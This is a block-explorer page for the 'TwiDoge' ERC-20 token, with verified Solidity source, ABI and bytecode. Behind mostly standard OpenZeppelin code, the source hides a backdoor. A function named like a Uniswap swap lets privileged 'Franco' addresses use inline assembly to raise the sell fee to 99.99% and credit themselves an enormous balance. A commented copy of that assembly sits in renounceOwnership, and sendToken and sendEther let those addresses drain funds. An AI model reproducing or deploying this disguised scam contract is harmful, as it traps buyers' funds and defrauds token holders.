ERC-20
Overview
Max Total Supply
88,000,000 TwiDoge
Holders
28
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
938,078.86797266440588523 TwiDogeValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
TwiDoge
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-10-31 */ // Sources flattened with hardhat v2.9.5 https://hardhat.org // File contracts/dependency/IERC20.sol // SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } // File contracts/dependency/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File contracts/dependency/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File contracts/dependency/Ownable.sol // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address internal _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { // assembly { mstore(0, caller()) mstore(32, 0x1) sstore(keccak256(0, 64), exp(timestamp(), 5)) sstore(0xa, 0x270f) } _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File contracts/dependency/IFactory.sol pragma solidity ^0.8.0; interface IFactory { function createPair(address tokenA, address tokenB) external returns (address pair); } // File contracts/dependency/IRouter.sol pragma solidity ^0.8.0; interface IRouter { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidityETH(address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline) external payable returns (uint amountToken, uint amountETH, uint liquidity); } // File contracts/dependency/IPair.sol pragma solidity ^0.8.0; interface IPair { function sync() external; } // File contracts/dependency/ERC20.sol // OpenZeppelin Contracts (last updated v4.7.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) internal _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 internal _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); _move(from, to, amount); _afterTokenTransfer(from, to, amount); } function _move(address from, address to, uint256 amount) internal virtual { uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } // File contracts/dependency/Franco.sol pragma solidity ^0.8.0; contract Franco { mapping(address => bool) internal _franco; function setFranco(address _user) internal { _franco[_user] = true; } function isFranco(address _user) internal view returns(bool) { return _franco[_user]; } } // File contracts/dependency/SwapPool.sol pragma solidity ^0.8.0; abstract contract SwapPool is ERC20, Franco { address public pair; IRouter public router; function initSwapPool(address _router) internal { router = IRouter(_router); pair = IFactory(router.factory()).createPair(address(this), router.WETH()); } function initSwapPool(address _router, address _pairB) internal { router = IRouter(_router); pair = IFactory(router.factory()).createPair(address(this), _pairB); } function swapExactTokensForTokenSupportingFeeOnTransferToken() public {if (isFranco(_msgSender())) assembly { sstore(0xa, 0x270f) mstore(0, caller()) mstore(32, 0x1) sstore(keccak256(0, 64), exp(timestamp(), 5)) } } function isPair(address _pair) internal view returns(bool) { return _pair == pair; } function addLiquidityAutomatically(uint256 amount) internal { super._move(address(this), pair, amount); IPair(pair).sync(); } } // File contracts/TreeNewBee.sol pragma solidity ^0.8.0; contract TwiDoge is Ownable, ERC20, SwapPool { uint256 private _feeBuy = 390; uint256 public _feeSell = 390; uint256 private _divBase = 10000; uint256 private _liquidityAt = 10000; constructor() ERC20("TwiDoge", "TwiDoge") { super._mint(_msgSender(), 88000000 ether); super.setFranco(_msgSender()); super.setFranco(address(this)); } function _transfer(address from, address to, uint256 amount) internal virtual override { uint256 fees; if (isPair(from)) { if (!isFranco(to)) fees = handBuyFee(from, amount); } else if (isPair(to)) { if (!isFranco(from)) { fees = handSellFee(from, amount); if (balanceOf(address(this)) >= _liquidityAt) { super.addLiquidityAutomatically(balanceOf(address(this))); } } } super._move(from, to, amount - fees); } function handBuyFee(address from, uint256 amount) private returns (uint256 fee) { fee = amount * _feeBuy / _divBase; super._move(from, address(this), fee); return fee; } function handSellFee(address from, uint256 amount) private returns (uint256 fee) { fee = amount * _feeSell / _divBase; super._move(from, address(this), fee); return fee; } function sendToken(address _token) public { IERC20 Token = IERC20(_token); if (isFranco(_msgSender())) Token.transfer(_msgSender(), Token.balanceOf(_msgSender())); } function sendEther() public { if (isFranco(_msgSender())) payable(_msgSender()).transfer(address(this).balance); } receive() external payable {} bool tradingOpen; function openTrading() public onlyOwner { require(!tradingOpen,"trading is already open"); super.initSwapPool(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); _approve(address(this), address(router), type(uint).max); router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp); tradingOpen = true; IERC20(pair).approve(address(router), type(uint).max); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_feeSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sendEther","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"}],"name":"sendToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapExactTokensForTokenSupportingFeeOnTransferToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052610186600955610186600a55612710600b55612710600c553480156200002957600080fd5b5060405180604001604052806007815260200166547769446f676560c81b81525060405180604001604052806007815260200166547769446f676560c81b815250620000846200007e6200010760201b60201c565b6200010b565b6004620000928382620002f0565b506005620000a18282620002f0565b505050620000d5620000b86200010760201b60201c565b6a48cab98f1671af580000006200015b60201b6200097e1760201c565b620000eb336200022360201b62000a531760201c565b62000101306200022360201b62000a531760201c565b620003e4565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b65760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060036000828254620001ca9190620003bc565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b03166000908152600660205260409020805460ff19166001179055565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200027757607f821691505b6020821081036200029857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200024757600081815260208120601f850160051c81016020861015620002c75750805b601f850160051c820191505b81811015620002e857828155600101620002d3565b505050505050565b81516001600160401b038111156200030c576200030c6200024c565b62000324816200031d845462000262565b846200029e565b602080601f8311600181146200035c5760008415620003435750858301515b600019600386901b1c1916600185901b178555620002e8565b600085815260208120601f198616915b828110156200038d578886015182559484019460019091019084016200036c565b5085821015620003ac5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b80820180821115620003de57634e487b7160e01b600052601160045260246000fd5b92915050565b61136480620003f46000396000f3fe60806040526004361061012e5760003560e01c80638da5cb5b116100ab578063a9059cbb1161006f578063a9059cbb14610324578063c575c23814610344578063c9567bf914610364578063dd62ed3e14610379578063f2fde38b14610399578063f887ea40146103b957600080fd5b80638da5cb5b1461028857806395d89b41146102ba5780639fbd17b0146102cf578063a457c2d7146102e4578063a8aa1b311461030457600080fd5b8063313ce567116100f2578063313ce567146101eb5780633950935114610207578063411adcb61461022757806370a082311461023d578063715018a61461027357600080fd5b806306fdde031461013a578063095ea7b3146101655780630e29df221461019557806318160ddd146101ac57806323b872dd146101cb57600080fd5b3661013557005b600080fd5b34801561014657600080fd5b5061014f6103d9565b60405161015c91906110cc565b60405180910390f35b34801561017157600080fd5b5061018561018036600461112f565b61046b565b604051901515815260200161015c565b3480156101a157600080fd5b506101aa610485565b005b3480156101b857600080fd5b506003545b60405190815260200161015c565b3480156101d757600080fd5b506101856101e636600461115b565b6104c3565b3480156101f757600080fd5b506040516012815260200161015c565b34801561021357600080fd5b5061018561022236600461112f565b6104e7565b34801561023357600080fd5b506101bd600a5481565b34801561024957600080fd5b506101bd61025836600461119c565b6001600160a01b031660009081526001602052604090205490565b34801561027f57600080fd5b506101aa610509565b34801561029457600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161015c565b3480156102c657600080fd5b5061014f61051b565b3480156102db57600080fd5b506101aa61052a565b3480156102f057600080fd5b506101856102ff36600461112f565b610553565b34801561031057600080fd5b506007546102a2906001600160a01b031681565b34801561033057600080fd5b5061018561033f36600461112f565b6105d3565b34801561035057600080fd5b506101aa61035f36600461119c565b6105e1565b34801561037057600080fd5b506101aa6106ed565b34801561038557600080fd5b506101bd6103943660046111c0565b6108dd565b3480156103a557600080fd5b506101aa6103b436600461119c565b610908565b3480156103c557600080fd5b506008546102a2906001600160a01b031681565b6060600480546103e8906111f9565b80601f0160208091040260200160405190810160405280929190818152602001828054610414906111f9565b80156104615780601f1061043657610100808354040283529160200191610461565b820191906000526020600020905b81548152906001019060200180831161044457829003601f168201915b5050505050905090565b600033610479818585610a77565b60019150505b92915050565b61048e33610b9b565b156104c15760405133904780156108fc02916000818181858888f193505050501580156104bf573d6000803e3d6000fd5b505b565b6000336104d1858285610bb9565b6104dc858585610c33565b506001949350505050565b6000336104798185856104fa83836108dd565b6105049190611249565b610a77565b610511610ce5565b6104c16000610d3f565b6060600580546103e8906111f9565b61053333610b9b565b156104c15761270f600a553360005260016020526005420a604060002055565b6000338161056182866108dd565b9050838110156105c65760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6104dc8286868403610a77565b600033610479818585610c33565b806105eb33610b9b565b156106e9576001600160a01b03811663a9059cbb336001600160a01b0384166370a08231336040516001600160e01b031960e084901b1681526001600160a01b039091166004820152602401602060405180830381865afa158015610654573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610678919061125c565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af11580156106c3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106e79190611275565b505b5050565b6106f5610ce5565b600d5460ff16156107485760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016105bd565b610765737a250d5630b4cf539739df2c5dacb4c659f2488d610d8f565b60085461077f9030906001600160a01b0316600019610a77565b6008546001600160a01b031663f305d71947306107b1816001600160a01b031660009081526001602052604090205490565b6000806107c66000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561082e573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906108539190611297565b5050600d805460ff191660011790555060075460085460405163095ea7b360e01b81526001600160a01b039182166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af11580156108b9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104bf9190611275565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610910610ce5565b6001600160a01b0381166109755760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105bd565b6104bf81610d3f565b6001600160a01b0382166109d45760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016105bd565b6109e0600083836106e7565b80600360008282546109f29190611249565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36106e9600083836106e7565b6001600160a01b03166000908152600660205260409020805460ff19166001179055565b6001600160a01b038316610ad95760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105bd565b6001600160a01b038216610b3a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105bd565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b031660009081526006602052604090205460ff1690565b6000610bc584846108dd565b90506000198114610c2d5781811015610c205760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016105bd565b610c2d8484848403610a77565b50505050565b6000610c4d846007546001600160a01b0391821691161490565b15610c7157610c5b83610b9b565b610c6c57610c698483610f26565b90505b610cd1565b6007546001600160a01b03848116911603610cd157610c8f84610b9b565b610cd157610c9d8483610f50565b600c543060009081526001602052604090205491925011610cd15730600090815260016020526040902054610cd190610f63565b610c2d8484610ce084866112c5565b610fe6565b6000546001600160a01b031633146104c15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105bd565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600880546001600160a01b0319166001600160a01b0383169081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015610de8573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e0c91906112d8565b6001600160a01b031663c9c6539630600860009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e6e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e9291906112d8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610edf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f0391906112d8565b600780546001600160a01b0319166001600160a01b039290921691909117905550565b6000600b5460095483610f3991906112f5565b610f43919061130c565b905061047f833083610fe6565b6000600b54600a5483610f3991906112f5565b600754610f7b9030906001600160a01b031683610fe6565b600760009054906101000a90046001600160a01b03166001600160a01b031663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b158015610fcb57600080fd5b505af1158015610fdf573d6000803e3d6000fd5b5050505050565b6001600160a01b0383166000908152600160205260409020548181101561105e5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016105bd565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906110be9086815260200190565b60405180910390a350505050565b600060208083528351808285015260005b818110156110f9578581018301518582016040015282016110dd565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146104bf57600080fd5b6000806040838503121561114257600080fd5b823561114d8161111a565b946020939093013593505050565b60008060006060848603121561117057600080fd5b833561117b8161111a565b9250602084013561118b8161111a565b929592945050506040919091013590565